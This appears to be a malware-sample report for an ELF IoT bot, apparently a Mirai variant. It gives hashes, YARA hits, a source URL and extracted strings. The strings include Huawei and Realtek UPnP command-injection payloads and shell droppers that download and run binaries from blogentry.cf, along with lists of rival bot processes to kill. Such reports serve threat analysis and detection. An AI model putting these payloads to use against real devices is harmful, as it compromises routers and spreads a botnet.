Sample details: e784923f048a9317ff2e3f913e8ba927 --

Hashes
MD5: e784923f048a9317ff2e3f913e8ba927
SHA1: add13cad24ed8c81c77df3a91598f29d28db7bbd
SHA256: 7e5f6afe0d14b0ef0757ed6a031352b2c250327777a7d37dcddbf94295534e44
SSDEEP: 1536:3tyFSuGdvginvM56mIX6LiYv0Sh00VT5Om7tUWcjkDpv9:dU0dv9m5g6+pSzVNO4Dd9
Details
File Type: ELF
Yara Hits
YRP/domain | YRP/IP | YRP/url | YRP/contentis_base64 | YRP/Misc_Suspicious_Strings | YRP/Big_Numbers1 |
Source
http://35.226.164.220/spc
Strings
		 HTTP/1.1
User-Agent: 
Host: 
Cookie: 
POST /ctrlt/DeviceUpgrade_1 HTTP/1.1
Content-Length: 430
Connection: keep-alive
Accept: */*
Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g blogentry.cf -l /tmp/rex -r /mips; /bin/busybox chmod 777 * /tmp/rex; /tmp/rex huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
_/proc/net/tcp
dfghjkllkjhgf.ml
140.11.13.37
POST /picsdesc.xml HTTP/1.1
Content-Length: 630
Accept-Encoding: gzip, deflate
SOAPAction: urn:schemas-upnp-org:service:WANIPConnection:1#AddPortMapping
Accept: /
User-Agent: Hello-World
Connection: keep-alive
<?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope//" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding//%22%3E<s:Body><u:AddPortMapping xmlns:u="urn:schemas-upnp-org:service:WANIPConnection:1"><NewRemoteHost></NewRemoteHost><NewExternalPort>47450</NewExternalPort><NewProtocol>TCP</NewProtocol><NewInternalPort>44382</NewInternalPort><NewInternalClient>cd /tmp/; wget http://blogentry.cf/mips; chmod +x mips; ./mips realtek</NewInternalClient><NewEnabled>1</NewEnabled><NewPortMappingDescription>syncthing</NewPortMappingDescription><NewLeaseDuration>0</NewLeaseDuration></u:AddPortMapping></s:Body></s:Envelope>
SERVZUXO
<=gael
75 edfm
5::=1fdef
5::=1fdeg
5::=1fde`
5::=1fdea
5::=1fdeb
758"=:
2=018efg
0125!8 
ZOJFKRA
FGDCWNV
HWCLVGAJ
QWRRMPV
RCQQUMPF
QGPTKAG
QWRGPTKQMP
1$=7&;! 1&
9; ;&;85
93gadd
91&8=:
rm -rf %s;
pkill -9 %s;killall -9 %s;
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;/bin/busybox wget http://blogentry.cf/love; sh love; wget http://blogentry.cf/love; sh love; /bin/busybox tftp -r tftp.sh -g blogentry.tk; sh tftp.sh; /bin/busybox tftp -c get tftp2.sh -g blogentry.tk; sh tftp2.sh
cd /tmp || cd /var/run || cd /dev/shm || cd /mnt || cd /var;rm -f *;/bin/busybox wget http://blogentry.cf/emptiness;sh emptiness; wget http://blogentry.cf/emptiness; sh emptiness
blogentry.tk
/tmp/*
/var/*
/var/run/*
/var/tmp/*
/dev/netslink/*
/dev/*
/dev/shm/*
/boot/*
/usr/*
/opt/*
amsjkfbns
xdf.mips
xdf.mipsel
xdf.x86_64
xdf.arm7
xdf.ppc
xdf.sh4
mipsel
arm*tel*b1
busybox*
badbox*
DFhxdhdf
dvrHelper
FDFDHFC
FTUdftui
GHfjfgvj
JIPJIPJj
JIPJuipjh
kmyx86_64
lolmipsel
RYrydry
TwoFace*
UYyuyioy
x86_64
XDzdfxzf
busybox
badbox
Mirai*
mirai*
cunty*IoT*
mips64
sh2elf
armv4tl
powerpc
powerpc440fp
jackmymips
jackmymips64
jackmymipsel
jackmysh2eb
jackmysh2elf
jackmysh4
jackmyx86
jackmyarmv5
jackmyarmv4tl
jackmyarmv4
jackmyarmv6
jackmyi686
jackmypowerpc
jackmypowerpc440fp
jackmyi586
jackmym68k
jackmysparc
jackmyx86_64
hackmymips
hackmymips64
hackmymipsel
hackmysh2eb
hackmysh2elf
hackmysh4
hackmyx86
hackmyarmv5
hackmyarmv4tl
hackmyarmv4
hackmyarmv6
hackmyi686
hackmypowerpc
hackmypowerpc440fp
hackmyi586
hackmym68k
hackmysparc
hackmyx86_64
busyboxterrorist
kmymips
kmymips64
kmymipsel
kmysh2eb
kmysh2elf
kmysh4
kmyx86
kmyarmv5
kmyarmv4tl
kmyarmv4
kmyarmv6
kmyi686
kmypowerpc
kmypowerpc440fp
kmyi586
kmym68k
kmysparc
lolmips
lolmips64
lolsh2eb
lolsh2elf
lolsh4
lolx86
lolarmv5
lolarmv4tl
lolarmv4
lolarmv6
loli686
mirai.linux
mirai.mips
lolpowerpc
lolpowerpc440fp
loli586
lolm68k
lolsparc
telmips
telmips64
telmipsel
telsh2eb
telsh2elf
telsh4
telx86
telarmv5
telarmv4tl
telarmv4
telarmv6
teli686
telpowerpc
telpowerpc440fp
teli586
telm68k
telsparc
telx86_64
TwoFacemips
TwoFacemips64
TwoFacemipsel
TwoFacesh2eb
TwoFacesh2elf
TwoFacesh4
TwoFacex86
TwoFacearmv5
TwoFacearmv4tl
TwoFacearmv4
TwoFacearmv6
TwoFacei686
TwoFacepowerpc
TwoFacepowerpc440fp
TwoFacei586
TwoFacem68k
TwoFacesparc
TwoFacex86_64
busybotnet
*mirai
*.mirai
cunty*
orion.mips
okiru.mips
nightcore.mips
lsp.modz
mipsxd
die.mips
dupessh*mips
*.mips
vulcan
jennifer*
okiru*
vulcana
vulcanb
vulcand
vulcane
vulcanx
vulcany
vulcanz
vulcang
apache2
telnetd
uEzAs"
FGNGVGF
vqMWPAG
gLEKLG
sWGP["
CLKOG"
QVCVWQ"
pgrmpv
jvvrdnmmf"
nmnlmevdm"
XMNNCPF"
egvnmacnkr"
(null)
hlLjztqZ
npxXoudifFeEgGaACScs
 +0-#'I
 !"N?OZB>
KM^_`abcdefghijk
mHoIJPqGRSTUVWXL\s]Yrp|{nzt[D&'()*+,-./0123456789:;<=@A%$FuvwxyE}~l
Unknown error 
Success
Operation not permitted
No such file or directory
No such process
Interrupted system call
Input/output error
No such device or address
Argument list too long
Exec format error
Bad file descriptor
No child processes
Resource temporarily unavailable
Cannot allocate memory
Permission denied
Bad address
Block device required
Device or resource busy
File exists
Invalid cross-device link
No such device
Not a directory
Is a directory
Invalid argument
Too many open files in system
Too many open files
Inappropriate ioctl for device
Text file busy
File too large
No space left on device
Illegal seek
Read-only file system
Too many links
Broken pipe
Numerical argument out of domain
Numerical result out of range
Resource deadlock avoided
File name too long
No locks available
Function not implemented
Directory not empty
Too many levels of symbolic links
No message of desired type
Identifier removed
Channel number out of range
Level 2 not synchronized
Level 3 halted
Level 3 reset
Link number out of range
Protocol driver not attached
No CSI structure available
Level 2 halted
Invalid exchange
Invalid request descriptor
Exchange full
No anode
Invalid request code
Invalid slot
Bad font file format
Device not a stream
No data available
Timer expired
Out of streams resources
Machine is not on the network
Package not installed
Object is remote
Link has been severed
Advertise error
Srmount error
Communication error on send
Protocol error
Multihop attempted
RFS specific error
Bad message
Value too large for defined data type
Name not unique on network
File descriptor in bad state
Remote address changed
Can not access a needed shared library
Accessing a corrupted shared library
.lib section in a.out corrupted
Attempting to link in too many shared libraries
Cannot exec a shared library directly
Invalid or incomplete multibyte or wide character
Interrupted system call should be restarted
Streams pipe error
Too many users
Socket operation on non-socket
Destination address required
Message too long
Protocol wrong type for socket
Protocol not available
Protocol not supported
Socket type not supported
Operation not supported
Protocol family not supported
Address family not supported by protocol
Address already in use
Cannot assign requested address
Network is down
Network is unreachable
Network dropped connection on reset
Software caused connection abort
Connection reset by peer
No buffer space available
Transport endpoint is already connected
Transport endpoint is not connected
Cannot send after transport endpoint shutdown
Too many references: cannot splice
Connection timed out
Connection refused
Host is down
No route to host
Operation already in progress
Operation now in progress
Stale NFS file handle
Structure needs cleaning
Not a XENIX named type file
No XENIX semaphores available
Is a named type file
Remote I/O error
Disk quota exceeded
No medium found
Wrong medium type
File locking deadlock error
?/dev/null
.shstrtab
.rodata
.ctors
.dtors